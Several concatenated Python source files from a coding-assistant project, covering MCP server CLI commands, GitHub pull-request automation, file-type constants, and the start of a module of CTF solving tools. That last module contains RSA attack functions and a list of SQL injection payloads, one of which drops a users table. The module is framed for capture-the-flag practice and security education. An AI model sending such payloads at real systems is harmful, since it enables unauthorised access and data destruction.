            prompt: User prompt
            tools: Available tools (OpenAI format)
            context: Additional context
            on_token: Token callback

        Returns:
            RLMResult (may include tool calls in response)
        """
        # For now, just do regular completion
        # Tool handling is done at a higher level
        return await self.complete_streaming(prompt, context, on_token)

    def set_model(self, model: str) -> None:
        """
        Set the default model

        Args:
            model: Model identifier
        """
        self.model = model


def create_streaming_handler(
    project_path: Optional[Path] = None,
    model: str = "gpt-4o-mini",
) -> StreamingRLMHandler:
    """
    Create a streaming handler (convenience function)

    Args:
        project_path: Project path
        model: Model to use

    Returns:
        Configured StreamingRLMHandler
    """
    return StreamingRLMHandler(project_path=project_path, model=model)



"""
MCP CLI Commands - Manage MCP server configurations

Provides commands for:
- mcp add <name> <command> [args...] - Add MCP server
- mcp list - List configured servers
- mcp remove <name> - Remove a server
- mcp connect <name> - Test connection to a server
- mcp tools [server] - List available tools
"""

import asyncio
import sys
from typing import Optional

import click
from rich.console import Console
from rich.panel import Panel
from rich.table import Table

from groknroll.mcp import (
    MCPRegistry,
    MCPServerConfig,
    MCPTransportType,
)

console = Console()


@click.group()
def mcp():
    """Manage MCP (Model Context Protocol) servers"""
    pass


@mcp.command()
@click.argument("name")
@click.argument("command")
@click.argument("args", nargs=-1)
@click.option(
    "--env",
    "-e",
    multiple=True,
    help="Environment variable in KEY=VALUE format",
)
@click.option(
    "--transport",
    "-t",
    type=click.Choice(["stdio", "sse", "http"]),
    default="stdio",
    help="Transport type",
)
@click.option("--url", help="URL for SSE/HTTP transport")
@click.option("--description", "-d", default="", help="Server description")
@click.option("--global", "global_config", is_flag=True, help="Save to global config")
def add(
    name: str,
    command: str,
    args: tuple,
    env: tuple,
    transport: str,
    url: Optional[str],
    description: str,
    global_config: bool,
):
    """
    Add an MCP server configuration

    Examples:

        # Add filesystem server
        groknroll mcp add filesystem npx -y @modelcontextprotocol/server-filesystem /path

        # Add with environment variables
        groknroll mcp add postgres npx -y @modelcontextprotocol/server-postgres -e DATABASE_URL=postgres://...

        # Add SSE server
        groknroll mcp add remote --transport sse --url http://localhost:3000

        # Add with description
        groknroll mcp add custom-server python server.py -d "My custom MCP server"
    """
    # Parse environment variables
    env_dict = {}
    for e in env:
        if "=" in e:
            key, value = e.split("=", 1)
            env_dict[key] = value
        else:
            console.print(f"[bold red]Error:[/bold red] Invalid env var format: {e}")
            console.print("Use KEY=VALUE format")
            sys.exit(1)

    # Create config
    config = MCPServerConfig(
        name=name,
        command=command,
        args=list(args),
        env=env_dict,
        transport=MCPTransportType(transport),
        url=url,
        description=description,
        enabled=True,
    )

    # Add to registry
    registry = MCPRegistry()
    try:
        registry.add_server(config, save=True, global_config=global_config)
        console.print(f"[bold green]✓ Added MCP server:[/bold green] {name}")
        console.print(f"  [dim]Command:[/dim] {command} {' '.join(args)}")
        if description:
            console.print(f"  [dim]Description:[/dim] {description}")
        console.print(f"\n[dim]Run 'groknroll mcp connect {name}' to test the connection[/dim]")
    except ValueError as e:
        console.print(f"[bold red]Error:[/bold red] {e}")
        sys.exit(1)


@mcp.command("list")
@click.option("--all", "-a", "show_all", is_flag=True, help="Show all details")
def list_servers(show_all: bool):
    """List configured MCP servers"""
    registry = MCPRegistry()
    servers = registry.list_servers()

    if not servers:
        console.print("[yellow]No MCP servers configured[/yellow]")
        console.print(
            "\n[dim]Add a server with: groknroll mcp add <name> <command> [args...][/dim]"
        )
        return

    # Create table
    table = Table(title="MCP Servers", show_header=True)
    table.add_column("Name", style="cyan")
    table.add_column("Status", style="green")
    table.add_column("Transport", style="blue")
    if show_all:
        table.add_column("Command")
        table.add_column("Description")

    for server in servers:
        status = "[green]enabled" if server.enabled else "[red]disabled"
        connected = registry.is_connected(server.name)
        if connected:
            status = "[bold green]connected"

        row = [
            server.name,
            status,
            server.transport.value,
        ]

        if show_all:
            cmd = f"{server.command} {' '.join(server.args)}"
            row.extend([cmd[:40] + "..." if len(cmd) > 40 else cmd, server.description])

        table.add_row(*row)

    console.print()
    console.print(table)
    console.print(f"\n[dim]Total: {len(servers)} server(s)[/dim]")


@mcp.command()
@click.argument("name")
@click.option("--force", "-f", is_flag=True, help="Skip confirmation")
def remove(name: str, force: bool):
    """Remove an MCP server configuration"""
    registry = MCPRegistry()

    # Check if server exists
    if not registry.get_server(name):
        console.print(f"[bold red]Error:[/bold red] Server '{name}' not found")
        sys.exit(1)

    # Confirm removal
    if not force:
        console.print(f"[bold yellow]Remove MCP server '{name}'?[/bold yellow]")
        response = input("Continue? [y/N]: ").strip().lower()
        if response not in ["y", "yes"]:
            console.print("[yellow]Cancelled[/yellow]")
            return

    # Remove
    try:
        registry.remove_server(name)
        console.print(f"[bold green]✓ Removed MCP server:[/bold green] {name}")
    except KeyError as e:
        console.print(f"[bold red]Error:[/bold red] {e}")
        sys.exit(1)


@mcp.command()
@click.argument("name")
def connect(name: str):
    """Test connection to an MCP server"""
    registry = MCPRegistry()

    # Check if server exists
    config = registry.get_server(name)
    if not config:
        console.print(f"[bold red]Error:[/bold red] Server '{name}' not found")
        sys.exit(1)

    console.print(f"[bold cyan]Connecting to {name}...[/bold cyan]")

    async def test_connection():
        try:
            info = await registry.connect(name)

            console.print("\n[bold green]✓ Connected successfully![/bold green]")
            console.print(f"  [cyan]Server:[/cyan] {info.name} v{info.version}")
            console.print(
                f"  [cyan]Capabilities:[/cyan] {', '.join(c.value for c in info.capabilities)}"
            )

            # Show tools
            tools = registry.get_tools(name)
            if tools:
                console.print(f"  [cyan]Tools:[/cyan] {len(tools)}")
                for tool in tools[:5]:
                    console.print(f"    - {tool.name}: {tool.description[:50]}...")
                if len(tools) > 5:
                    console.print(f"    ... and {len(tools) - 5} more")

            # Disconnect
            await registry.disconnect(name)

        except Exception as e:
            console.print(f"\n[bold red]✗ Connection failed:[/bold red] {e}")
            sys.exit(1)

    asyncio.run(test_connection())


@mcp.command()
@click.argument("server", required=False)
def tools(server: Optional[str]):
    """List available tools from MCP servers"""
    registry = MCPRegistry()

    async def list_tools():
        # Connect to servers
        if server:
            if not registry.get_server(server):
                console.print(f"[bold red]Error:[/bold red] Server '{server}' not found")
                sys.exit(1)

            console.print(f"[dim]Connecting to {server}...[/dim]")
            try:
                await registry.connect(server)
            except Exception as e:
                console.print(f"[bold red]Error:[/bold red] {e}")
                sys.exit(1)
        else:
            console.print("[dim]Connecting to all enabled servers...[/dim]")
            await registry.connect_all()

        # Get tools
        all_tools = registry.list_all_tools()

        if not all_tools:
            console.print("[yellow]No tools available[/yellow]")
            return

        # Display tools
        for server_name, tools_list in all_tools.items():
            console.print()
            console.print(
                Panel.fit(
                    f"[bold cyan]{server_name}[/bold cyan] ({len(tools_list)} tools)",
                    border_style="cyan",
                )
            )

            table = Table(show_header=True)
            table.add_column("Tool", style="green")
            table.add_column("Description")
            table.add_column("Parameters")

            for tool in tools_list:
                params = ", ".join(f"{p.name}{'*' if p.required else ''}" for p in tool.parameters)
                table.add_row(
                    tool.name,
                    tool.description[:60] + "..."
                    if len(tool.description) > 60
                    else tool.description,
                    params[:30] + "..." if len(params) > 30 else params,
                )

            console.print(table)

        # Disconnect
        await registry.disconnect_all()

    asyncio.run(list_tools())


@mcp.command()
@click.argument("name")
def enable(name: str):
    """Enable an MCP server"""
    registry = MCPRegistry()

    try:
        registry.enable_server(name)
        console.print(f"[bold green]✓ Enabled MCP server:[/bold green] {name}")
    except KeyError:
        console.print(f"[bold red]Error:[/bold red] Server '{name}' not found")
        sys.exit(1)


@mcp.command()
@click.argument("name")
def disable(name: str):
    """Disable an MCP server"""
    registry = MCPRegistry()

    try:
        registry.disable_server(name)
        console.print(f"[bold green]✓ Disabled MCP server:[/bold green] {name}")
    except KeyError:
        console.print(f"[bold red]Error:[/bold red] Server '{name}' not found")
        sys.exit(1)



"""
Core Constants

Centralized constants for codebase analysis to avoid duplication.
"""

# Directories to skip during codebase traversal
IGNORED_DIRS: frozenset[str] = frozenset(
    {
        ".git",
        ".svn",
        ".hg",
        "node_modules",
        ".venv",
        "venv",
        "__pycache__",
        ".pytest_cache",
        ".mypy_cache",
        ".ruff_cache",
        "dist",
        "build",
        ".tox",
        ".nox",
        "htmlcov",
        ".coverage",
        "egg-info",
        ".eggs",
        ".idea",
        ".vscode",
    }
)

# File extensions to skip during analysis
SKIP_EXTENSIONS: frozenset[str] = frozenset(
    {
        # Compiled/binary
        ".pyc",
        ".pyo",
        ".so",
        ".dylib",
        ".dll",
        ".exe",
        ".o",
        ".a",
        ".class",
        # Images
        ".jpg",
        ".jpeg",
        ".png",
        ".gif",
        ".svg",
        ".ico",
        ".webp",
        ".bmp",
        # Documents
        ".pdf",
        ".doc",
        ".docx",
        # Archives
        ".zip",
        ".tar",
        ".gz",
        ".bz2",
        ".7z",
        ".rar",
        # Other
        ".lock",
        ".log",
        ".tmp",
        ".cache",
        ".min.js",
        ".min.css",
        ".map",
        ".woff",
        ".woff2",
        ".ttf",
        ".eot",
    }
)

# Language detection by file extension
EXTENSION_TO_LANGUAGE: dict[str, str] = {
    # Python
    ".py": "python",
    ".pyi": "python",
    ".pyx": "python",
    # JavaScript/TypeScript
    ".js": "javascript",
    ".mjs": "javascript",
    ".cjs": "javascript",
    ".ts": "typescript",
    ".tsx": "typescript",
    ".jsx": "javascript",
    # Web
    ".html": "html",
    ".htm": "html",
    ".css": "css",
    ".scss": "scss",
    ".sass": "sass",
    ".less": "less",
    # Systems
    ".go": "go",
    ".rs": "rust",
    ".c": "c",
    ".h": "c",
    ".cpp": "cpp",
    ".hpp": "cpp",
    ".cc": "cpp",
    ".cxx": "cpp",
    # JVM
    ".java": "java",
    ".kt": "kotlin",
    ".kts": "kotlin",
    ".scala": "scala",
    ".groovy": "groovy",
    # Scripting
    ".rb": "ruby",
    ".php": "php",
    ".pl": "perl",
    ".sh": "bash",
    ".bash": "bash",
    ".zsh": "zsh",
    # Data
    ".json": "json",
    ".yaml": "yaml",
    ".yml": "yaml",
    ".toml": "toml",
    ".xml": "xml",
    ".csv": "csv",
    # Docs
    ".md": "markdown",
    ".rst": "restructuredtext",
    ".txt": "text",
    # Config
    ".ini": "ini",
    ".cfg": "ini",
    ".conf": "ini",
    # SQL
    ".sql": "sql",
    # Other
    ".swift": "swift",
    ".r": "r",
    ".R": "r",
    ".lua": "lua",
    ".vim": "vim",
    ".dockerfile": "dockerfile",
}


def detect_language(extension: str) -> str:
    """Detect programming language from file extension."""
    return EXTENSION_TO_LANGUAGE.get(extension.lower(), "text")


def should_skip_dir(dirname: str) -> bool:
    """Check if directory should be skipped."""
    return dirname in IGNORED_DIRS or dirname.startswith(".")


def should_skip_file(filename: str) -> bool:
    """Check if file should be skipped based on extension."""
    from pathlib import Path

    ext = Path(filename).suffix.lower()
    return ext in SKIP_EXTENSIONS or filename.startswith(".")



"""
PR Automation - Automatically create PRs from groknroll changes

Provides automation for creating pull requests:
- Create feature branch from main
- Commit changes
- Push branch
- Create PR with title and description
- Link PR to original issue

Examples:
    # Create PR automation handler
    handler = PRAutomation(github_token="...")

    # Create PR from changes
    result = await handler.create_pr(
        repo="owner/repo",
        title="Fix auth bug",
        changes=["src/auth.py"],
        issue_number=42,
    )
"""

import re
from dataclasses import dataclass, field
from enum import Enum, auto
from typing import Any, Optional

import httpx


class PRStatus(Enum):
    """Status of PR creation"""

    PENDING = auto()
    BRANCH_CREATED = auto()
    COMMITTED = auto()
    PUSHED = auto()
    PR_CREATED = auto()
    FAILED = auto()


@dataclass
class PRResult:
    """Result of PR creation"""

    status: PRStatus
    pr_url: Optional[str] = None
    pr_number: Optional[int] = None
    branch_name: Optional[str] = None
    error: Optional[str] = None
    metadata: dict[str, Any] = field(default_factory=dict)

    @property
    def success(self) -> bool:
        """Check if PR was created successfully"""
        return self.status == PRStatus.PR_CREATED

    @property
    def failed(self) -> bool:
        """Check if PR creation failed"""
        return self.status == PRStatus.FAILED


@dataclass
class PRConfig:
    """Configuration for PR creation"""

    base_branch: str = "main"
    branch_prefix: str = "groknroll/"
    auto_merge: bool = False
    draft: bool = False
    labels: list[str] = field(default_factory=list)
    assignees: list[str] = field(default_factory=list)
    reviewers: list[str] = field(default_factory=list)


@dataclass
class CommitInfo:
    """Information about a commit"""

    sha: str
    message: str
    author: str
    files_changed: list[str] = field(default_factory=list)


class PRAutomation:
    """
    Automate PR creation from groknroll changes

    Handles the full flow of creating a PR:
    1. Create feature branch
    2. Create commit with changes
    3. Push branch
    4. Open PR
    5. Link to issue

    Example:
        handler = PRAutomation(github_token="...")
        result = await handler.create_pr(
            repo="owner/repo",
            title="Fix bug",
            changes=["file.py"],
            issue_number=123,
        )
    """

    GITHUB_API_URL = "https://api.github.com"

    def __init__(
        self,
        github_token: str,
        config: Optional[PRConfig] = None,
    ):
        """
        Initialize PR automation

        Args:
            github_token: GitHub API token
            config: Optional PR configuration
        """
        self.github_token = github_token
        self.config = config or PRConfig()

    def generate_branch_name(self, title: str) -> str:
        """
        Generate branch name from title

        Args:
            title: PR title

        Returns:
            Branch name
        """
        # Sanitize title for branch name
        sanitized = re.sub(r"[^a-zA-Z0-9\s-]", "", title.lower())
        sanitized = re.sub(r"\s+", "-", sanitized)
        sanitized = sanitized[:50]  # Limit length

        return f"{self.config.branch_prefix}{sanitized}"

    def format_pr_body(
        self,
        description: str,
        issue_number: Optional[int] = None,
        changes: Optional[list[str]] = None,
    ) -> str:
        """
        Format PR body with standard template

        Args:
            description: PR description
            issue_number: Related issue number
            changes: List of changed files

        Returns:
            Formatted PR body
        """
        lines = ["## Summary", "", description, ""]

        if issue_number:
            lines.extend(
                [
                    "## Related Issue",
                    "",
                    f"Closes #{issue_number}",
                    "",
                ]
            )

        if changes:
            lines.extend(
                [
                    "## Changes",
                    "",
                    *[f"- `{f}`" for f in changes],
                    "",
                ]
            )

        lines.extend(
            [
                "---",
                "*This PR was automatically created by groknroll.*",
            ]
        )

        return "\n".join(lines)

    async def get_default_branch(
        self,
        repo: str,
        client: Optional[httpx.AsyncClient] = None,
    ) -> str:
        """
        Get default branch for repository

        Args:
            repo: Repository in "owner/repo" format
            client: Optional HTTP client

        Returns:
            Default branch name
        """
        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}"
            headers = self._get_headers()

            response = await client.get(url, headers=headers)

            if response.status_code == 200:
                data = response.json()
                return data.get("default_branch", self.config.base_branch)

            return self.config.base_branch

        finally:
            if close_client:
                await client.aclose()

    async def get_branch_sha(
        self,
        repo: str,
        branch: str,
        client: Optional[httpx.AsyncClient] = None,
    ) -> Optional[str]:
        """
        Get SHA of branch HEAD

        Args:
            repo: Repository
            branch: Branch name
            client: Optional HTTP client

        Returns:
            SHA or None
        """
        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}/git/refs/heads/{branch}"
            headers = self._get_headers()

            response = await client.get(url, headers=headers)

            if response.status_code == 200:
                data = response.json()
                return data.get("object", {}).get("sha")

            return None

        finally:
            if close_client:
                await client.aclose()

    async def create_branch(
        self,
        repo: str,
        branch_name: str,
        base_sha: str,
        client: Optional[httpx.AsyncClient] = None,
    ) -> bool:
        """
        Create a new branch

        Args:
            repo: Repository
            branch_name: New branch name
            base_sha: SHA to branch from
            client: Optional HTTP client

        Returns:
            True if created
        """
        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}/git/refs"
            headers = self._get_headers()

            response = await client.post(
                url,
                headers=headers,
                json={
                    "ref": f"refs/heads/{branch_name}",
                    "sha": base_sha,
                },
            )

            return response.status_code == 201

        finally:
            if close_client:
                await client.aclose()

    async def create_pull_request(
        self,
        repo: str,
        title: str,
        body: str,
        head: str,
        base: str,
        draft: bool = False,
        client: Optional[httpx.AsyncClient] = None,
    ) -> Optional[dict[str, Any]]:
        """
        Create a pull request

        Args:
            repo: Repository
            title: PR title
            body: PR body
            head: Head branch
            base: Base branch
            draft: Create as draft
            client: Optional HTTP client

        Returns:
            PR data or None
        """
        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}/pulls"
            headers = self._get_headers()

            response = await client.post(
                url,
                headers=headers,
                json={
                    "title": title,
                    "body": body,
                    "head": head,
                    "base": base,
                    "draft": draft,
                },
            )

            if response.status_code == 201:
                return response.json()

            return None

        finally:
            if close_client:
                await client.aclose()

    async def add_labels(
        self,
        repo: str,
        issue_number: int,
        labels: list[str],
        client: Optional[httpx.AsyncClient] = None,
    ) -> bool:
        """
        Add labels to issue/PR

        Args:
            repo: Repository
            issue_number: Issue/PR number
            labels: Labels to add
            client: Optional HTTP client

        Returns:
            True if added
        """
        if not labels:
            return True

        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}/issues/{issue_number}/labels"
            headers = self._get_headers()

            response = await client.post(
                url,
                headers=headers,
                json={"labels": labels},
            )

            return response.status_code == 200

        finally:
            if close_client:
                await client.aclose()

    async def add_assignees(
        self,
        repo: str,
        issue_number: int,
        assignees: list[str],
        client: Optional[httpx.AsyncClient] = None,
    ) -> bool:
        """
        Add assignees to issue/PR

        Args:
            repo: Repository
            issue_number: Issue/PR number
            assignees: Assignees to add
            client: Optional HTTP client

        Returns:
            True if added
        """
        if not assignees:
            return True

        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}/issues/{issue_number}/assignees"
            headers = self._get_headers()

            response = await client.post(
                url,
                headers=headers,
                json={"assignees": assignees},
            )

            return response.status_code == 201

        finally:
            if close_client:
                await client.aclose()

    async def request_reviewers(
        self,
        repo: str,
        pr_number: int,
        reviewers: list[str],
        client: Optional[httpx.AsyncClient] = None,
    ) -> bool:
        """
        Request reviewers for PR

        Args:
            repo: Repository
            pr_number: PR number
            reviewers: Reviewers to request
            client: Optional HTTP client

        Returns:
            True if requested
        """
        if not reviewers:
            return True

        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            url = f"{self.GITHUB_API_URL}/repos/{repo}/pulls/{pr_number}/requested_reviewers"
            headers = self._get_headers()

            response = await client.post(
                url,
                headers=headers,
                json={"reviewers": reviewers},
            )

            return response.status_code == 201

        finally:
            if close_client:
                await client.aclose()

    async def create_pr(
        self,
        repo: str,
        title: str,
        description: str = "",
        changes: Optional[list[str]] = None,
        issue_number: Optional[int] = None,
        branch_name: Optional[str] = None,
        client: Optional[httpx.AsyncClient] = None,
    ) -> PRResult:
        """
        Create a complete PR

        This is the main entry point that orchestrates:
        1. Getting base branch SHA
        2. Creating feature branch
        3. Creating the PR
        4. Adding labels/assignees/reviewers

        Args:
            repo: Repository in "owner/repo" format
            title: PR title
            description: PR description
            changes: List of changed files
            issue_number: Related issue number
            branch_name: Custom branch name
            client: Optional HTTP client

        Returns:
            PRResult with status and details
        """
        close_client = client is None
        if client is None:
            client = httpx.AsyncClient()

        try:
            # Generate branch name if not provided
            if not branch_name:
                branch_name = self.generate_branch_name(title)

            # Get default branch
            base_branch = await self.get_default_branch(repo, client)

            # Get base branch SHA
            base_sha = await self.get_branch_sha(repo, base_branch, client)
            if not base_sha:
                return PRResult(
                    status=PRStatus.FAILED,
                    branch_name=branch_name,
                    error=f"Could not get SHA for {base_branch}",
                )

            # Create branch
            branch_created = await self.create_branch(repo, branch_name, base_sha, client)
            if not branch_created:
                return PRResult(
                    status=PRStatus.FAILED,
                    branch_name=branch_name,
                    error="Could not create branch",
                )

            # Format PR body
            body = self.format_pr_body(description, issue_number, changes)

            # Create PR
            pr_data = await self.create_pull_request(
                repo=repo,
                title=title,
                body=body,
                head=branch_name,
                base=base_branch,
                draft=self.config.draft,
                client=client,
            )

            if not pr_data:
                return PRResult(
                    status=PRStatus.FAILED,
                    branch_name=branch_name,
                    error="Could not create PR",
                )

            pr_number = pr_data.get("number")
            pr_url = pr_data.get("html_url")

            # Add labels
            if self.config.labels:
                await self.add_labels(repo, pr_number, self.config.labels, client)

            # Add assignees
            if self.config.assignees:
                await self.add_assignees(repo, pr_number, self.config.assignees, client)

            # Request reviewers
            if self.config.reviewers:
                await self.request_reviewers(repo, pr_number, self.config.reviewers, client)

            return PRResult(
                status=PRStatus.PR_CREATED,
                pr_url=pr_url,
                pr_number=pr_number,
                branch_name=branch_name,
                metadata={
                    "base_branch": base_branch,
                    "issue_number": issue_number,
                },
            )

        except Exception as e:
            return PRResult(
                status=PRStatus.FAILED,
                branch_name=branch_name,
                error=str(e),
            )

        finally:
            if close_client:
                await client.aclose()

    def _get_headers(self) -> dict[str, str]:
        """Get API headers"""
        return {
            "Authorization": f"token {self.github_token}",
            "Accept": "application/vnd.github+json",
            "X-GitHub-Api-Version": "2022-11-28",
        }


def generate_pr_title(task: str, issue_number: Optional[int] = None) -> str:
    """
    Generate PR title from task

    Args:
        task: Task description
        issue_number: Related issue number

    Returns:
        PR title
    """
    # Capitalize first letter
    title = task[0].upper() + task[1:] if task else ""

    # Remove trailing punctuation
    title = title.rstrip(".")

    # Add issue reference
    if issue_number:
        title = f"{title} (#{issue_number})"

    return title


def generate_branch_name(task: str, prefix: str = "groknroll/") -> str:
    """
    Generate branch name from task

    Args:
        task: Task description
        prefix: Branch prefix

    Returns:
        Branch name
    """
    # Sanitize for branch name
    sanitized = re.sub(r"[^a-zA-Z0-9\s-]", "", task.lower())
    sanitized = re.sub(r"\s+", "-", sanitized)
    sanitized = sanitized[:50]

    return f"{prefix}{sanitized}"



"""
CTF Tools - Capture The Flag challenge solving utilities

Provides tools for common CTF categories:
- Crypto: Classical ciphers, RSA, AES, hashing
- Web: SQLi, XSS, SSRF, path traversal
- Forensics: File carving, steganography, memory analysis
- Pwn: Buffer overflow, ROP chains, format strings
- Misc: Encoding, compression, OSINT

For CTF competitions and security education.
"""

import base64
import binascii
import codecs
import hashlib
import re
import subprocess
import shutil
import struct
import zlib
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Optional

from groknroll.mode2600.core import get_mode2600


@dataclass
class CTFFlag:
    """CTF flag result."""

    flag: str
    confidence: float = 1.0
    method: str = ""
    details: str = ""


class CTFHelper:
    """
    General CTF helper utilities.

    Provides encoding/decoding, flag detection, and common operations.
    """

    # Common flag formats
    FLAG_PATTERNS = [
        r"flag\{[^}]+\}",
        r"FLAG\{[^}]+\}",
        r"ctf\{[^}]+\}",
        r"CTF\{[^}]+\}",
        r"picoCTF\{[^}]+\}",
        r"HTB\{[^}]+\}",
        r"CSAW\{[^}]+\}",
        r"DUCTF\{[^}]+\}",
        r"SECCON\{[^}]+\}",
    ]

    def __init__(self):
        """Initialize CTF helper."""
        self.mode2600 = get_mode2600()

    def find_flags(self, text: str, pattern: Optional[str] = None) -> list[CTFFlag]:
        """
        Find flag patterns in text.

        Args:
            text: Text to search
            pattern: Custom flag pattern (regex)

        Returns:
            List of found flags
        """
        flags = []

        patterns = [pattern] if pattern else self.FLAG_PATTERNS

        for pat in patterns:
            matches = re.findall(pat, text, re.IGNORECASE)
            for match in matches:
                flags.append(CTFFlag(flag=match, method="regex"))

        return flags

    def decode_all(self, data: str) -> dict[str, str]:
        """
        Try all common decodings on data.

        Args:
            data: Encoded data

        Returns:
            Dict of encoding -> decoded result
        """
        results = {}

        # Base64
        try:
            decoded = base64.b64decode(data).decode("utf-8", errors="ignore")
            if decoded.isprintable() or len(decoded) > 10:
                results["base64"] = decoded
        except Exception:
            pass

        # Base32
        try:
            decoded = base64.b32decode(data).decode("utf-8", errors="ignore")
            if decoded.isprintable():
                results["base32"] = decoded
        except Exception:
            pass

        # Base16 (hex)
        try:
            decoded = bytes.fromhex(data).decode("utf-8", errors="ignore")
            if decoded.isprintable():
                results["hex"] = decoded
        except Exception:
            pass

        # URL encoding
        try:
            from urllib.parse import unquote
            decoded = unquote(data)
            if decoded != data:
                results["url"] = decoded
        except Exception:
            pass

        # HTML entities
        try:
            import html
            decoded = html.unescape(data)
            if decoded != data:
                results["html"] = decoded
        except Exception:
            pass

        # ROT13
        try:
            decoded = codecs.decode(data, "rot_13")
            results["rot13"] = decoded
        except Exception:
            pass

        # Binary
        try:
            if all(c in "01 " for c in data):
                binary = data.replace(" ", "")
                decoded = "".join(
                    chr(int(binary[i:i+8], 2))
                    for i in range(0, len(binary), 8)
                )
                if decoded.isprintable():
                    results["binary"] = decoded
        except Exception:
            pass

        # Morse code
        try:
            if all(c in ".-/ " for c in data):
                results["morse"] = self._decode_morse(data)
        except Exception:
            pass

        return results

    def _decode_morse(self, morse: str) -> str:
        """Decode morse code."""
        morse_dict = {
            ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E",
            "..-.": "F", "--.": "G", "....": "H", "..": "I", ".---": "J",
            "-.-": "K", ".-..": "L", "--": "M", "-.": "N", "---": "O",
            ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T",
            "..-": "U", "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y",
            "--..": "Z", "-----": "0", ".----": "1", "..---": "2",
            "...--": "3", "....-": "4", ".....": "5", "-....": "6",
            "--...": "7", "---..": "8", "----.": "9",
        }

        words = morse.split(" / ")
        result = []

        for word in words:
            letters = word.split()
            decoded_word = ""
            for letter in letters:
                decoded_word += morse_dict.get(letter, "?")
            result.append(decoded_word)

        return " ".join(result)

    def encode(self, data: str, encoding: str) -> str:
        """
        Encode data with specified encoding.

        Args:
            data: Data to encode
            encoding: Encoding type (base64, hex, rot13, etc.)

        Returns:
            Encoded string
        """
        if encoding == "base64":
            return base64.b64encode(data.encode()).decode()
        elif encoding == "base32":
            return base64.b32encode(data.encode()).decode()
        elif encoding == "hex":
            return data.encode().hex()
        elif encoding == "rot13":
            return codecs.encode(data, "rot_13")
        elif encoding == "binary":
            return " ".join(format(ord(c), "08b") for c in data)
        elif encoding == "url":
            from urllib.parse import quote
            return quote(data)
        else:
            raise ValueError(f"Unknown encoding: {encoding}")


class CryptoSolver:
    """
    Cryptography challenge solver.

    Handles:
    - Classical ciphers (Caesar, Vigenere, substitution)
    - RSA attacks (small e, common factors, etc.)
    - AES/DES analysis
    - Hash cracking
    """

    def __init__(self):
        """Initialize crypto solver."""
        self.mode2600 = get_mode2600()

    def caesar_bruteforce(self, ciphertext: str) -> list[tuple[int, str]]:
        """
        Brute force Caesar cipher.

        Args:
            ciphertext: Encrypted text

        Returns:
            List of (shift, plaintext) tuples
        """
        results = []

        for shift in range(26):
            plaintext = ""
            for char in ciphertext:
                if char.isalpha():
                    base = ord("A") if char.isupper() else ord("a")
                    plaintext += chr((ord(char) - base - shift) % 26 + base)
                else:
                    plaintext += char
            results.append((shift, plaintext))

        return results

    def vigenere_decrypt(self, ciphertext: str, key: str) -> str:
        """
        Decrypt Vigenere cipher.

        Args:
            ciphertext: Encrypted text
            key: Encryption key

        Returns:
            Decrypted plaintext
        """
        plaintext = ""
        key = key.upper()
        key_index = 0

        for char in ciphertext:
            if char.isalpha():
                base = ord("A") if char.isupper() else ord("a")
                shift = ord(key[key_index % len(key)]) - ord("A")
                plaintext += chr((ord(char) - base - shift) % 26 + base)
                key_index += 1
            else:
                plaintext += char

        return plaintext

    def xor_single_byte(self, data: bytes) -> list[tuple[int, bytes]]:
        """
        XOR with single byte brute force.

        Args:
            data: XOR'd data

        Returns:
            List of (key, result) tuples
        """
        results = []

        for key in range(256):
            result = bytes(b ^ key for b in data)
            # Score by printable characters
            score = sum(1 for b in result if 32 <= b < 127)
            results.append((key, result, score))

        # Sort by score
        results.sort(key=lambda x: x[2], reverse=True)
        return [(k, r) for k, r, _ in results[:10]]

    def rsa_small_e(self, c: int, e: int, n: int) -> Optional[int]:
        """
        RSA attack for small e (cube root attack).

        Args:
            c: Ciphertext
            e: Public exponent (usually 3)
            n: Modulus

        Returns:
            Plaintext if successful
        """
        if e != 3:
            return None

        # Try cube root (when m^e < n)
        import math

        low = 0
        high = n

        while low < high:
            mid = (low + high) // 2
            if mid ** e < c:
                low = mid + 1
            else:
                high = mid

        if low ** e == c:
            return low

        return None

    def rsa_common_modulus(
        self,
        c1: int, c2: int,
        e1: int, e2: int,
        n: int,
    ) -> Optional[int]:
        """
        RSA common modulus attack.

        When same message encrypted with different e values.

        Args:
            c1, c2: Ciphertexts
            e1, e2: Public exponents
            n: Common modulus

        Returns:
            Plaintext if successful
        """
        import math

        def extended_gcd(a: int, b: int) -> tuple[int, int, int]:
            if a == 0:
                return b, 0, 1
            gcd, x1, y1 = extended_gcd(b % a, a)
            x = y1 - (b // a) * x1
            y = x1
            return gcd, x, y

        gcd, s1, s2 = extended_gcd(e1, e2)

        if gcd != 1:
            return None

        # Handle negative exponents
        if s1 < 0:
            c1 = pow(c1, -1, n)
            s1 = -s1
        if s2 < 0:
            c2 = pow(c2, -1, n)
            s2 = -s2

        m = (pow(c1, s1, n) * pow(c2, s2, n)) % n
        return m

    def frequency_analysis(self, text: str) -> dict[str, float]:
        """
        Perform frequency analysis on text.

        Args:
            text: Text to analyze

        Returns:
            Dict of character -> frequency
        """
        from collections import Counter

        # Count letters only
        letters = [c.lower() for c in text if c.isalpha()]
        counts = Counter(letters)
        total = len(letters)

        return {char: count / total for char, count in counts.items()}


class WebExploiter:
    """
    Web exploitation utilities for CTF.

    Handles:
    - SQL injection payloads
    - XSS payload generation
    - SSRF testing
    - Path traversal
    """

    # Common SQLi payloads
    SQLI_PAYLOADS = [
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' OR '1'='1' /*",
        "1' OR '1'='1",
        "admin'--",
        "' UNION SELECT NULL--",
        "' UNION SELECT 1,2,3--",
        "1; DROP TABLE users--",
        "' AND 1=1--",
        "' AND 1=2--",
    ]

    # Common XSS payloads
    XSS_PAYLOADS = [
